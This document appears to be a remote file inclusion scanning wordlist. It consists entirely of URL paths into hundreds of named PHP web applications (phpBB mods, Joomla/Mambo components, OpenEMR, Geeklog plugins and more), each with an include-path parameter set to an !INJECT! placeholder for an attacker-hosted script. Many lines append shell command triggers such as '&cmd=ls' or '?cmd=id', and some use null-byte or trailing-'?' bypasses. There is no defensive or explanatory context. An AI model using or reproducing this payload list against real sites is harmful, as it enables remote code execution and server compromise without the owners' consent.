-/index.php?gen=!INJECT!
-/index.php?get=!INJECT!
-/index.php?home_name=!INJECT!
-/index.php?ilang=!INJECT!?
-/index.php?inc_dir=!INJECT!
-/index.php?inc_dir=!INJECT!?
-/index.php?includeDir=!INJECT!
-/index.php?includeFooter=!INJECT!
-/index.php?includesdir=!INJECT!
-/index.php?insPath=!INJECT!
-/index.php?lang=!INJECT!
-/index.php?language=!INJECT!?
-/index.php?language=en&main_page=!INJECT!
-/index.php?lizge=!INJECT!?&cmd=ls
-/index.php?lng=!INJECT!
-/index.php?load=!INJECT!
-/index.php?loadpage=!INJECT!
-/index.php?main_tabid=1&main_content=!INJECT!
-/index.php?may=!INJECT!
-/index.php?middle=!INJECT!
-/index.php?mode=!INJECT!
-/index.php?modpath=!INJECT!
-/index.php?module=PostWrap&page=!INJECT!
-/index.php?mosConfig_absolute_path=!INJECT!
-/index.php?news7["functions"]=!INJECT!
-/index.php?news_include_path=!INJECT!
-/index.php?open=!INJECT!
-/index.php?option=com_custompages&cpage=!INJECT!?
-/index.php?page=!INJECT!
-/index.php?page=!INJECT!%00
-/index.php?page=!INJECT!?
-/index.php?page!INJECT!
-/index.php?page[path]=!INJECT!?&cmd=ls
-/index.php?pagename=!INJECT!
-/index.php?pager=!INJECT!
-/index.php?pagina=!INJECT!?
-/index.php?path_to_folder=!INJECT!?cmd=id
-/index.php?pg=!INJECT!?
-/index.php?phpbb_root_path=!INJECT!
-/index.php?plugin=!INJECT!
-/index.php?principal=!INJECT!
-/index.php?proMod=!INJECT!
-/index.php?proMod=!INJECT!?cmd
-/index.php?project=!INJECT!
-/index.php?repinc=!INJECT!?
-/index.php?root_prefix=!INJECT!
-/index.php?root_prefix=!INJECT!?
-/index.php?section=!INJECT!
-/index.php?site=!INJECT!
-/index.php?site_path=!INJECT!
-/index.php?styl[top]=!INJECT!??
-/index.php?template=!INJECT!?
-/index.php?templates_dir=!INJECT!?
-/index.php?theme=!INJECT!
-/index.php?themepath=!INJECT!?
-/index.php?themesdir=!INJECT!
-/index.php?this_path=!INJECT!?
-/index.php?txt=!INJECT!
-/index.php?up=!INJECT!
-/index.php?url=!INJECT!
-/index.php?w=!INJECT!
-/index.php?way=!INJECT!??????????????
-/index1.php?=!INJECT!
-/index1.php?inc=!INJECT!
-/index1.php?inhalt=!INJECT!
-/index2.php?=!INJECT!
-/index2.php?content=!INJECT!
-/index2.php?s=!INJECT!
-/index2.php?x=!INJECT!
-/indexinfo.php?bibtexrootrel=!INJECT!?
-/indexk.php?lib_path=!INJECT!?
-/info.php?file=!INJECT!
-/inhalt.php?dateien[news]=!INJECT!?
-/init.php?API_HOME_DIR=!INJECT!
-/init.php?scriptpath=!INJECT!?
-/initialize.php?hmail_config[includepath]=!INJECT!&cmd=dir
-/initiate.php?abs_path=!INJECT!
-/install.php?_NE[AbsPath]=!INJECT!
-/install.php?install_dir=!INJECT!
-/install/config.php?path=!INJECT!
-/install/di.php?pathtoserverdata=!INJECT!
-/install/index.php?content_php=!INJECT!
-/install/install3.php?database=none&cabsolute_path=!INJECT!
-/integration/shortstat/configuration.php?SPL_CFG[dirroot]=!INJECT!?
-/interact/modules/forum/embedforum.php?CONFIG[LANGUAGE_CPATH]=!INJECT!?
-/interact/modules/scorm/lib.inc.php?CONFIG[BASE_PATH]=!INJECT!?
-/interface/billing/billing_process.php?srcdir=!INJECT!?
-/interface/editors/-custom.php?bField[bf_data]=!INJECT!
-/interface/editors/custom.php?bField[bf_data]=!INJECT!
-/interface/new/new_patient_save.php?srcdir=!INJECT!?
-/intern/admin/?rootdir=!INJECT!
-/intern/admin/other/backup.php?admin=1&rootdir=!INJECT!
-/intern/clan/member_add.php?rootdir=!INJECT!
-/intern/config/forum.php?rootdir=!INJECT!
-/intern/config/key_2.php?rootdir=!INJECT!
-/ip.inc.php?type=1&cgipath=!INJECT!
-/ipeer_site/?page=!INJECT!?
-/joinus.php?vwar_root=!INJECT!
-/joinus.php?vwar_root=!INJECT!?&cmd=ls
-/joomla_path/administrator/components/com_x-shop/admin.x-shop?mosConfig_absolute_path=!INJECT!?
-/joomla_path/components/com_articles.php?absolute_path=!INJECT!?
-/js/bbcodepress/bbcode-form.php?BBCODE_path=!INJECT!
-/js/wptable-tinymce.php?ABSPATH=!INJECT!
-/jscript.php?my_ms[root]=!INJECT!?
-/kernel/class/ixpts.class.php?IXP_ROOT_PATH=!INJECT!
-/kernel/loadkernel.php?installPath=!INJECT!
-/kmitaadmin/kmitam/htmlcode.php?file=!INJECT!?
-/ktmlpro/includes/ktedit/toolbar.php?dirDepth=!INJECT!
-/lang/leslangues.php?fichier=!INJECT!
-/lang_english/lang_main_album.php?phpbb_root_path=!INJECT!?a=
-/language/lang_english/lang_activity.php?phpbb_root_path=!INJECT!
-/language/lang_english/lang_admin_album.php?phpbb_root_path=!INJECT!?a=
-/language/lang_german/lang_admin_album.php?phpbb_root_path=!INJECT!?a=
-/language/lang_german/lang_main_album.php?phpbb_root_path=!INJECT!?a=
-/latestposts.php?forumspath=!INJECT!
-/latex.php?bibtexrootrel=!INJECT!?
-/layout/default/params.php?gConf[dir][layouts]=!INJECT!?
-/ldap/authldap.php?includePath=!INJECT!
-/learnPath/include/scormExport.inc.php?includePath=!INJECT!
-/lib.editor.inc.php?sys_path=!INJECT!?
-/lib/Loggix/Module/Calendar.php?pathToIndex=!INJECT!
-/lib/Loggix/Module/Comment.php?pathToIndex=!INJECT!
-/lib/Loggix/Module/Rss.php?pathToIndex=!INJECT!
-/lib/Loggix/Module/Trackback.php?pathToIndex=!INJECT!
-/lib/action/rss.php?lib=!INJECT!?
-/lib/activeutil.php?set[include_path]=!INJECT!?
-/lib/addressbook.php?GLOBALS[basedir]=!INJECT!
-/lib/armygame.php?libpath=!INJECT!
-/lib/authuser.php?root=!INJECT!
-/lib/base.php?BaseCfg[BaseDir]=!INJECT!
-/lib/connect.php?root=!INJECT!
-/lib/connected_users.lib.php3?ChatPath=!INJECT!
-/lib/connected_users.lib.php3?ChatPath=!INJECT!?
-/lib/db/mysql.class.php?root=!INJECT!
-/lib/db/postgres.class.php?root=!INJECT!
-/lib/functions.php?DOC_ROOT=!INJECT!
-/lib/googlesearch/GoogleSearch.php?APP[path][lib]=!INJECT!?
-/lib/header.php?DOC_ROOT=!INJECT!
-/lib/language.php?_LIB_DIR=!INJECT!
-/lib/live_status.lib.php?ROOT=!INJECT!
-/lib/misc.php?root=!INJECT!
-/lib/nl/nl.php?g_strRootDir=!INJECT!
-/lib/obj/collection.class.php?GLOBALS[application][app_root]=!INJECT!
-/lib/obj/content_image.class.php?GLOBALS[application][app_root]=!INJECT!
-/lib/pcltar.lib.php?g_pcltar_lib_dir=!INJECT!
-/lib/pcltrace.lib.php?g_pcltar_lib_dir=!INJECT!
-/lib/rs.php?rootpath=!INJECT!
-/lib/selectlang.php?BBC_LANGUAGE_PATH=!INJECT!
-/lib/smarty/SmartyFU.class.php?system[smarty][dir]=!INJECT!?
-/lib/static/header.php?set_menu=!INJECT!
-/lib/tpl.inc.php?conf[classpath]=!INJECT!
-/libraries/comment/postComment.php?path[cb]=!INJECT!?a=
-/libraries/database.php?path=!INJECT!???
-/libraries/lib-remotehost.inc.php?phpAds_geoPlugin=!INJECT!
-/libraries/pcl/pcltar.php?g_pcltar_lib_dir=!INJECT!
-/library/authorize.php?login_form=!INJECT!?
-/library/translation.inc.php?GLOBALS[srcdir]=!INJECT!?
-/libs/db.php?path_local=!INJECT!
-/libs/ftp.php?path_local=!INJECT!
-/libs/lom.php?ETCDIR=!INJECT!
-/libsecure.php?abs_path=!INJECT!?
-/license.php?CONFIG[MWCHAT_Libs]=!INJECT!?
-/link_main.php?phpbb_root_path=!INJECT!
-/linkadmin.php?page=!INJECT!?
-/linksnet_newsfeed/linksnet_linkslog_rss.php?dirpath_linksnet_newsfeed=!INJECT!?
-/list.php?phpbb_root_path=!INJECT!
-/lms_path/modules/userpanel.php?CONFIG[directories][userpanel_dir]=!INJECT!
-/lms_path/modules/welcome.php?_LIB_DIR=!INJECT!
-/load_lang.php?_SERWEB[configdir]=!INJECT!
-/load_lang.php?_SERWEB[serwebdir]=!INJECT!
-/load_phplib.php?_PHPLIB[libdir]=!INJECT!
-/loader.php?GLOBALS=!INJECT!
-/local/lib/lcUser.php?LIBDIR=!INJECT!?
-/log.php?bibtexrootrel=!INJECT!?
-/login.php3?cl_headers=!INJECT!
-/login.php?base_dir=!INJECT!
-/login.php?blog_theme=!INJECT!
-/login.php?langfile=!INJECT!
-/login.php?pachtofile=!INJECT!
-/login.php?srcdir=!INJECT!?
-/login.php?value=!INJECT!??
-/lovecms/install/index.php?step=!INJECT!?
-/m2f/m2f_cron.php?m2f_root_path=!INJECT!
-/m2f/m2f_forum.php?m2f_root_path=!INJECT!
-/m2f/m2f_mailinglist.php?m2f_root_path=!INJECT!
-/m2f/m2f_phpbb204.php?m2f_root_path=!INJECT!
-/maguz.php?site=!INJECT!
-/mail/childwindow.inc.php?form=!INJECT!?
-/mail/content/fnc-readmail3.php?__SOCKETMAIL_ROOT=!INJECT!?
-/mail_this_entry/mail_autocheck.php?pm_path=!INJECT!?&cmd=ls
-/main.inc.php?pathtoscript=!INJECT!
-/main.php?config[search_disp]=true&include_dir=!INJECT!
-/main.php?id=!INJECT!
-/main.php?include_path=!INJECT!?
-/main.php?pageURL=!INJECT!
-/main.php?pagina=!INJECT!
-/main/forum/komentar.php?site_path=!INJECT!
-/main/main.php?pi=!INJECT!
-/main/ppcbannerclick.php?INC=!INJECT!?
-/main/ppcclick.php?INC=!INJECT!?
-/main_prepend.php?_SERWEB[functionsdir]=!INJECT!
-/mainpage.php?docroot=!INJECT!?cmd
-/mamboleto.php?mosConfig_absolute_path=!INJECT!
-/mambots/editors/path/jscripts/tiny_mce/plugins/preview/preview.php?mosConfig_absolute_path=!INJECT!
-/manage_songs.php?foing_root_path=!INJECT!
-/manager/admin/index.php?MGR=!INJECT!
-/manager/admin/p_ins.php?MGR=!INJECT!
-/manager/admin/u_ins.php?MGR=!INJECT!
-/manager/articles.php?_PX_config[manager_path]=!INJECT!
-/manager/static/view.php?propID=0&INC=!INJECT!
-/master.php?root_path=!INJECT!
-/mcNews/admin/header.php?skinfile=!INJECT!
-/mcf.php?content=!INJECT!
-/mcnews/admin/install.php?l=!INJECT!
-/mediagallery/public_html/maint/ftpmedia.php?_MG_CONF[path_html]=!INJECT!
-/member.php?vwar_root=!INJECT!
-/member/usercp_menu.php?script_folder=!INJECT!
-/members/index.php?INC=!INJECT!?
-/members/registration.php?INC=!INJECT!?
-/members_help.php?hlp=!INJECT!?
-/membres/membreManager.php?include_path=!INJECT!?
-/menu.php3?cl_headers=!INJECT!
-/menu.php?functions_file=!INJECT!
-/mep/frame.php?chem=!INJECT!?
-/microcms/includes/file_manager/special.php?fm_includes_special=!INJECT!
-/middle.php?file=!INJECT!
-/migrateNE2toNE3.php?_NE[AbsPath]=!INJECT!
-/mindmeld/acweb/admin_index.php?MM_GLOBALS[home]=!INJECT!?
-/mindmeld/include/ask.inc.php?MM_GLOBALS[home]=!INJECT!?
-/mindmeld/include/learn.inc.php?MM_GLOBALS[home]=!INJECT!?
-/mindmeld/include/manage.inc.php?MM_GLOBALS[home]=!INJECT!?
-/mindmeld/include/mind.inc.php?MM_GLOBALS[home]=!INJECT!?
-/mindmeld/include/sensory.inc.php?MM_GLOBALS[home]=!INJECT!?
-/mini-pub.php/front-end/img.php?sFileName=!INJECT!?
-/minimal/wiki.php?page=!INJECT!?
-/misc/function.php3?path=!INJECT!?
-/mitglieder.php?config[root_ordner]=!INJECT!?&cmd=id
-/mkportal/include/user.php?MK_PATH=!INJECT!
-/mkportal/include/user.php?MK_PATH=!INJECT!?
-/mod/authent.php4?rootpath=!INJECT!
-/mod/image/index.php?config[pathMod]=!INJECT!
-/mod/liens/index.php?config[pathMod]=!INJECT!
-/mod/liste/index.php?config[pathMod]=!INJECT!
-/mod/special/index.php?config[pathMod]=!INJECT!
-/mod/texte/index.php?config[pathMod]=!INJECT!
-/mod_membre/inscription.php?chemin=!INJECT!?
-/mod_phpalbum/sommaire_admin.php?chemin=!INJECT!?
-/modernbill/include/html/config.php?DIR=!INJECT!
-/modifyform.html?code=!INJECT!
-/mods/business_functions.php?GALLERY_BASEDIR=!INJECT!
-/mods/config/load.inc.php?moddir=!INJECT!?
-/mods/http/load.inc.php?moddir=!INJECT!?
-/mods/ui_functions.php?GALLERY_BASEDIR=!INJECT!
-/module/forum/forum.php?fd=!INJECT!=';
-/module/forum/main.php?id=1&main_dir=!INJECT!?&
-/modules.php?name=!INJECT!&file=article&sid=2
-/modules/4nAlbum/public/displayCategory.php?basepath=!INJECT!
-/modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=!INJECT!
-/modules/Calendar/admin/update.php?calpath=!INJECT!?
-/modules/Calendar/calendar.php?calpath=!INJECT!?
-/modules/Calendar/scheme.php?calpath=!INJECT!?
-/modules/Discipline/CategoryBreakdownTime.php?FocusPath=!INJECT!
-/modules/Discipline/CategoryBreakdownTime.php?staticpath=!INJECT!
-/modules/Discipline/StudentFieldBreakdown.php?staticpath=!INJECT!
-/modules/Forums/admin/admin_styles.php?phpbb_root_path=!INJECT!
-/modules/MusooTemplateLite.php?GLOBALS[ini_array][EXTLIB_PATH]=!INJECT!
-/modules/My_eGallery/index.php?basepath=!INJECT!
-/modules/My_eGallery/public/displayCategory.php?basepath=!INJECT!
-/modules/Mysqlfinder/MysqlfinderAdmin.php?_SESSION[PATH_COMPOSANT]=!INJECT!?
-/modules/NukeAI/util.php?AIbasedir=!INJECT!
-/modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=!INJECT!
-/modules/SoundImporter.php?GLOBALS[ini_array][EXTLIB_PATH]=!INJECT!
-/modules/abook/foldertree.php?baseDir==!INJECT!?
-/modules/addons/plugin.php?doc_root=!INJECT!
-/modules/admin/include/config.php?doc_root=!INJECT!
-/modules/admin/include/localize.php?doc_root=!INJECT!
-/modules/agendax/addevent.inc.php?agendax_path=!INJECT!&cmd=id
-/modules/bank/includes/design/main.inc.php?bank_data[root]=!INJECT!?
-/modules/basicfog/basicfogfactory.class.php?PATH_TO_CODE=!INJECT!
-/modules/birstday/birst.php?exbb[home_path]=!INJECT!?
-/modules/birstday/profile_show.php?exbb[home_path]=!INJECT!?
-/modules/birstday/select.php?exbb[home_path]=!INJECT!?
-/modules/blocks/headerfile.php?system[path]=!INJECT!
-/modules/calendar/index.php?inc_dir=!INJECT!
-/modules/calendar/minicalendar.php?GLOBALS[rootdp]=./&GLOBALS[gsLanguage]=!INJECT!?
-/modules/calendar/mod_calendar.php?absolute_path=!INJECT!?
-/modules/certinfo/index.php?full_path=!INJECT!
-/modules/character_roster/include.php?mod_root=!INJECT!?
-/modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=!INJECT!?
-/modules/coppermine/themes/default/theme.php?THEME_DIR=!INJECT!
-/modules/downloads/lib/LM_Downloads.php?pathToIndex=!INJECT!
-/modules/dungeon/tick/allincludefortick.php?PATH_TO_CODE=!INJECT!
-/modules/emails/index.php?full_path=!INJECT!
-/modules/events/index.php?full_path=!INJECT!
-/modules/fax/index.php?full_path=!INJECT!
-/modules/files/blocks/latest_files.php?system[path]=!INJECT!
-/modules/files/index.php?full_path=!INJECT!
-/modules/files/list.php?full_path=!INJECT!
-/modules/filters/headerfile.php?system[path]=!INJECT!
-/modules/formmailer/formmailer.admin.inc.php?BASE_DIR[jax_formmailer]=!INJECT!?
-/modules/forums/blocks/latest_posts.php?system[path]=!INJECT!
-/modules/global/inc/content.inc.php?sIncPath=!INJECT!?
-/modules/groupadm/index.php?full_path=!INJECT!
-/modules/groups/headerfile.php?system[path]=!INJECT!
-/modules/guestbook/index.php?CONFIG[local_root]=!INJECT!?
-/modules/history/index.php?full_path=!INJECT!
-/modules/home.module.php?repmod=!INJECT!?
-/modules/horoscope/footer.php?xoopsConfig[root_path]=!INJECT!
-/modules/icontent/include/wysiwyg/spaw_control.class.php?spaw_root=!INJECT!
-/modules/info/index.php?full_path=!INJECT!
-/modules/links/blocks/links.php?system[path]=!INJECT!
-/modules/links/showlinks.php?language_home=&rootdp=zZz&gsLanguage=!INJECT!
-/modules/links/submit_links.php?rootdp=zZz&gsLanguage=!INJECT!
-/modules/log/index.php?full_path=!INJECT!
-/modules/mail/index.php?full_path=!INJECT!
-/modules/menu/headerfile.php?system[path]=!INJECT!
-/modules/messages/index.php?full_path=!INJECT!
-/modules/mod_as_category.php?mosConfig_absolute_path=!INJECT!
-/modules/mod_as_category/mod_as_category.php?mosConfig_absolute_path=!INJECT!
-/modules/mod_calendar.php?absolute_path=!INJECT!
-/modules/mod_flatmenu.php?mosConfig_absolute_path=!INJECT!
-/modules/mod_mainmenu.php?mosConfig_absolute_path=!INJECT!
-/modules/mod_weather.php?absolute_path=!INJECT!?
-/modules/mx_smartor/admin/admin_album_otf.php?phpbb_root_path=!INJECT!?
-/modules/newbb_plus/config.php?bbPath[root_theme]=!INJECT!
-/modules/newbb_plus/votepolls.php?bbPath[path]=!INJECT!
-/modules/news/blocks/latest_news.php?system[path]=!INJECT!
-/modules/newusergreatings/pm_newreg.php?exbb[home_path]=!INJECT!?
-/modules/organizations/index.php?full_path=!INJECT!
-/modules/phones/index.php?full_path=!INJECT!
-/modules/pms/index.php?module_path=!INJECT!???
-/modules/poll/inlinepoll.php?language_home=&rootdp=zZz&gsLanguage=!INJECT!
-/modules/poll/showpoll.php?language_home=&rootdp=zZz&gsLanguage=!INJECT!
-/modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=!INJECT!?
-/modules/presence/index.php?full_path=!INJECT!
-/modules/projects/index.php?full_path=!INJECT!
-/modules/projects/list.php?full_path=!INJECT!
-/modules/projects/summary.inc.php?full_path=!INJECT!
-/modules/punish/p_error.php?exbb[home_path]=!INJECT!?
-/modules/punish/profile.php?exbb[home_path]=!INJECT!?
-/modules/reports/index.php?full_path=!INJECT!
-/modules/search/index.php?full_path=!INJECT!
-/modules/search/search.php?language_home=&rootdp=zZz&gsLanguage=!INJECT!?
-/modules/settings/headerfile.php?system[path]=!INJECT!
-/modules/snf/index.php?full_path=!INJECT!
-/modules/syslog/index.php?full_path=!INJECT!
-/modules/tasks/index.php?full_path=!INJECT!
-/modules/tasks/searchsimilar.php?full_path=!INJECT!
-/modules/tasks/summary.inc.php?full_path=!INJECT!
-/modules/threadstop/threadstop.php?exbb[home_path]=!INJECT!?
-/modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=!INJECT!
-/modules/tml/block.tag.php?GLOBALS[PTH][classes]=!INJECT!
-/modules/tsdisplay4xoops/blocks/tsdisplay4xoops_block2.php?xoops_url=!INJECT!
-/modules/useradm/index.php?full_path=!INJECT!
-/modules/users/headerfile.php?system[path]=!INJECT!
-/modules/vWar_Account/includes/functions_common.php?vwar_root2=!INJECT!
-/modules/visitors2/include/config.inc.php?lvc_include_dir=!INJECT!?
-/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=!INJECT!
-/modules/wiwimod/spaw/spaw_control.class.php?spaw_root=!INJECT!
-/modules/xfsection/modify.php?dir_module=!INJECT!
-/modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=!INJECT!
-/modules/xt_conteudo/admin/spaw/spaw_control.class.php?spaw_root=!INJECT!
-/modules/xt_conteudo/admin/spaw/spaw_control.class.php?spaw_root=!INJECT!?
-/modulistica/mdl_save.php?CLASSPATH=!INJECT!
-/modx-0.9.6.2/assets/snippets/reflect/snippet.reflect.php?reflect_base=!INJECT!?
-/moodle/admin/utfdbmigrate.php?cmd=!INJECT!
-/moosegallery/display.php?type=!INJECT!?&cmd=[command]
-/mostlyce/jscripts/tiny_mce/plugins/htmltemplate/htmltemplate.php?mosConfig_absolute_path=!INJECT!
-/moteur/moteur.php?chemin=!INJECT!?
-/movie_cls.php?full_path=!INJECT!
-/msDb.php?GLOBALS[ini_array][EXTLIB_PATH]=!INJECT!
-/music/buycd.php?HTTP_DOCUMENT_ROOT=!INJECT!?
-/mutant_includes/mutant_functions.php?phpbb_root_path=!INJECT!
-/mxBB/modules/kb_mods/includes/kb_constants.php?module_root_path=!INJECT!
-/mxBB/modules/mx_newssuite/includes/newssuite_constants.php?mx_root_path=!INJECT!
-/mygallery/myfunctions/mygallerybrowser.php?myPath=!INJECT!
-/myphpcommander_path/system/lib/package.php?gl_root=!INJECT!?cmd
-/mysave.php?file=!INJECT!
-/naboard_pnr.php?skin=!INJECT!?
-/ncaster/admin/addons/archive/archive.php?adminfolder=!INJECT!
-/network_module_selector.php?path_prefix=!INJECT!
-/news.php?CONFIG[script_path]=!INJECT!?
-/news.php?config[root_ordner]=!INJECT!?&cmd=id
-/news.php?scriptpath=!INJECT!?
-/news.php?vwar_root=!INJECT!
-/news/include/createdb.php?langfile;=!INJECT!?
-/news/include/customize.php?l=!INJECT!?
-/news/newstopic_inc.php?indir=!INJECT!
-/news/scripts/news_page.php?script_path=!INJECT!?
-/newsadmin.php?action=!INJECT!
-/newsarchive.php?path_to_script=!INJECT!?&cmd=ls
-/newsfeeds/includes/aggregator.php?zf_path=!INJECT!
-/newsfeeds/includes/controller.php?zf_path=!INJECT!
-/newsletter/newsletter.php?waroot=!INJECT!
-/newsp/lib/class.Database.php?path=!INJECT!?
-/newticket.php?lang=!INJECT!
-/noah/modules/noevents/templates/mfa_theme.php?tpls[1]=!INJECT!
-/noticias.php?inc=!INJECT!?
-/nucleus/plugins/skinfiles/index.php?DIR_LIBS=!INJECT!
-/nuke_path/iframe.php?file=!INJECT!
-/nukebrowser.php?filnavn=!INJECT!&filhead=!INJECT!&cmd=id
-/nuseo/admin/nuseo_admin_d.php?nuseo_dir=!INJECT!?
-/oaboard_en/forum.php?inc=!INJECT!
-/ocp-103/index.php?req_path=!INJECT!
-/ocs/include/footer.inc.php?fullpath=!INJECT!?
-/ocs/include/theme.inc.php?fullpath=!INJECT!?
-/ocs/openemr-2.8.2/custom/import_xml.php?srcdir=!INJECT!?
-/olbookmarks-0.7.4/themes/test1.php?!INJECT!
-/oneadmin/adminfoot.php?path[docroot]=!INJECT!
-/oneadmin/blogger/sampleblogger.php?path[docroot]=!INJECT!?
-/oneadmin/config-bak.php?include_once=!INJECT!
-/oneadmin/config.php?path[docroot]=!INJECT!
-/oneadmin/ecommerce/sampleecommerce.php?path[docroot]=!INJECT!?
-/online.php?config[root_ordner]=!INJECT!?&cmd=id
-/open-admin/plugins/site_protection/index.php?config%5boi_dir%5d=!INJECT!?
-/openi-admin/base/fileloader.php?config[openi_dir]=!INJECT!
-/openrat/themes/default/include/html/insert.inc.php?tpl_dir=!INJECT!???
-/opensurveypilot/administration/user/lib/group.inc.php?cfgPathToProjectAdmin=!INJECT!
-/ops/gals.php?news_file=!INJECT!
-/order/login.php?svr_rootscript=!INJECT!
-/osData/php121/php121db.php?php121dir=!INJECT!%00
-/ossigeno-suite-2.2_pre1/upload/xax/admin/modules/uninstall_module.php?level=!INJECT!?
-/ossigeno_modules/ossigeno-catalogo/xax/ossigeno/catalogo/common.php?ossigeno=!INJECT!?
-/owimg.php3?path=!INJECT!
-/p-news.php?pn_lang=!INJECT!
-/pafiledb/includes/pafiledb_constants.php?module_root_path=!INJECT!
-/page.php?goto=!INJECT!
-/page.php?id=!INJECT!
-/panel/common/theme/default/header_setup.php?path[docroot]=!INJECT!
-/param_editor.php?folder=!INJECT!?
-/parse/parser.php?WN_BASEDIR=!INJECT!
-/patch/?language_id=!INJECT!
-/patch/tools/send_reminders.php?noSet=0&includedir=!INJECT!?
-/paypalipn/ipnprocess.php?INC=!INJECT!?
-/pda/pda_projects.php?offset=!INJECT!
-/phfito/phfito-post?SRC_PATH=!INJECT!
-/phorum/plugin/replace/plugin.php?PHORUM[settings_dir]=!INJECT!
-/photo_comment.php?toroot=!INJECT!
-/php-inc/log.inc.php?SKIN_URL=!INJECT!
-/php-include-robotsservices.php?page=!INJECT!
-/php-nuke/modules/Forums/admin/admin_styles.php?phpbb_root_path=!INJECT!
-/php.incs/common.inc.php?cm_basedir=!INJECT!?
-/php/init.gallery.php?include_class=!INJECT!/something
-/php121db.php?php121dir=!INJECT!%00
-/php4you.php?dir=!INJECT!?
-/phpAdsNew-2.0.7/libraries/lib-remotehost.inc?phpAds_geoPlugin=!INJECT!?
-/phpBB2/shoutbox.php?phpbb_root_path=!INJECT!
-/phpCards.header.php?CardPath=!INJECT!?
-/phpGedView/help_text_vars.php?cmd=dir&PGV_BASE_DIRECTORY=!INJECT!
-/phpMyChat.php3?=!INJECT!?cmd=id
-/phpMyConferences_8.0.2/common/visiteurs/include/menus.inc.php?lvc_include_dir=!INJECT!?
-/phpQLAdmin-2.2.7/ezmlm.php?_SESSION[path]=!INJECT!?
-/phpSiteBackup-0.1/pcltar.lib.php?g_pcltar_lib_dir=!INJECT!
-/phpbb/sendmsg.php?phpbb_root_path=!INJECT!
-/phpcalendar/includes/calendar.php?phpc_root_path=!INJECT!?
-/phpcalendar/includes/setup.php?phpc_root_path=!INJECT!?
-/phpdebug_PATH/test/debug_test.php?debugClassLocation=!INJECT!
-/phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=!INJECT!
-/phpffl/phpffl_webfiles/program_files/livedraft/livedraft.php?PHPFFL_FILE_ROOT=!INJECT!
-/phphd_downloads/common.php?phphd_real_path=!INJECT!
-/phphost_directoryv2/include/admin.php?rd=!INJECT!?
-/phphtml.php?htmlclass_path=!INJECT!
-/phpi/edit_top_feature.php?include_connection=!INJECT!
-/phpi/edit_topics_feature.php?include_connection=!INJECT!
-/phplib/site_conf.php?ordnertiefe=!INJECT!
-/phplib/version/1.3.3/functionen/class.csv.php?tt_docroot=!INJECT!
-/phplib/version/1.3.3/functionen/produkte_nach_serie.php?tt_docroot=!INJECT!
-/phplib/version/1.3.3/functionen/ref_kd_rubrik.php?tt_docroot=!INJECT!
-/phplib/version/1.3.3/module/hg_referenz_jobgalerie.php?tt_docroot=!INJECT!
-/phplib/version/1.3.3/module/produkte_nach_serie_alle.php?tt_docroot=!INJECT!
-/phplib/version/1.3.3/module/ref_kd_rubrik.php?tt_docroot=!INJECT!
-/phplib/version/1.3.3/module/referenz.php?tt_docroot=!INJECT!
-/phplib/version/1.3.3/module/surfer_aendern.php?tt_docroot=!INJECT!
-/phplib/version/1.3.3/module/surfer_anmeldung_NWL.php?tt_docroot=!INJECT!
-/phplib/version/1.3.3/standard/1/lay.php?tt_docroot=!INJECT!
-/phplib/version/1.3.3/standard/3/lay.php?tt_docroot=!INJECT!
-/phplinks/includes/smarty.php?full_path_to_public_program=!INJECT!
-/phporacleview/inc/include_all.inc.php?page_dir=!INJECT!?
-/phppc/poll.php?is_phppc_included=1&relativer_pfad=!INJECT!?
-/phppc/poll_kommentar.php?is_phppc_included=1&relativer_pfad=!INJECT!?
-/phppc/poll_sm.php?is_phppc_included=1&relativer_pfad=!INJECT!?
-/phpquickgallery/gallery_top.inc.php?textFile=!INJECT!
-/phpreactor/inc/polls.inc.php?pathtohomedir=!INJECT!?
-/phpreactor/inc/updatecms.inc.php?pathtohomedir=!INJECT!?
-/phpreactor/inc/users.inc.php?pathtohomedir=!INJECT!?
-/phpreactor/inc/view.inc.php?pathtohomedir=!INJECT!?
-/phpress/adisplay.php?lang=!INJECT!
-/phpunity-postcard.php?plgallery_epost=1&gallery_path=!INJECT!?
-/phpwcms_template/inc_script/frontend_render/navigation/config_HTML_MENU.php?HTML_MENU_DirPath=!INJECT!
-/phpwcms_template/inc_script/frontend_render/navigation/config_PHPLM.php?HTML_MENU_DirPath=!INJECT!
-/phpyabs/moduli/libri/index.php?Azione=!INJECT!
-/pirvate/ltwpdfmonth.php?ltw_config['include_dir]=!INJECT!
-/playlist.php?phpbb_root_path=!INJECT!
-/plugin/HP_DEV/cms2.php?s_dir=!INJECT!?
-/plugin/gateway/gnokii/init.php?apps_path[plug]=!INJECT!?
-/plugins/1_Adressbuch/delete.php?folder=!INJECT!
-/plugins/BackUp/Archive.php?bkpwp_plugin_path=!INJECT!?
-/plugins/BackUp/Archive/Predicate.php?bkpwp_plugin_path=!INJECT!?
-/plugins/BackUp/Archive/Reader.php?bkpwp_plugin_path=!INJECT!?
-/plugins/BackUp/Archive/Writer.php?bkpwp_plugin_path=!INJECT!?
-/plugins/links/functions.inc?_CONF[path]=!INJECT!
-/plugins/polls/functions.inc?_CONF[path]=!INJECT!
-/plugins/rss_importer_functions.php?sitepath=!INJECT!?
-/plugins/safehtml/HTMLSax3.php?dir[plugins]=!INJECT!?
-/plugins/safehtml/safehtml.php?dir[plugins]=!INJECT!?
-/plugins/spamx/BlackList.Examine.class.php?_CONF[path]=!INJECT!
-/plugins/spamx/DeleteComment.Action.class.php?_CONF[path]=!INJECT!
-/plugins/spamx/EditHeader.Admin.class.php?_CONF[path]=!INJECT!
-/plugins/spamx/EditIP.Admin.class.php?_CONF[path]=!INJECT!
-/plugins/spamx/EditIPofURL.Admin.class.php?_CONF[path]=!INJECT!
-/plugins/spamx/IPofUrl.Examine.class.php?_CONF[path]=!INJECT!
-/plugins/spamx/Import.Admin.class.php?_CONF[path]=!INJECT!
-/plugins/spamx/LogView.Admin.class.php?_CONF[path]=!INJECT!
-/plugins/spamx/MTBlackList.Examine.class.php?_CONF[path]=!INJECT!
-/plugins/spamx/MailAdmin.Action.class.php?_CONF[path]=!INJECT!
-/plugins/spamx/MassDelTrackback.Admin.class.php?_CONF[path]=!INJECT!
-/plugins/spamx/MassDelete.Admin.class.php?_CONF[path]=!INJECT!
-/plugins/staticpages/functions.inc?_CONF[path]=!INJECT!
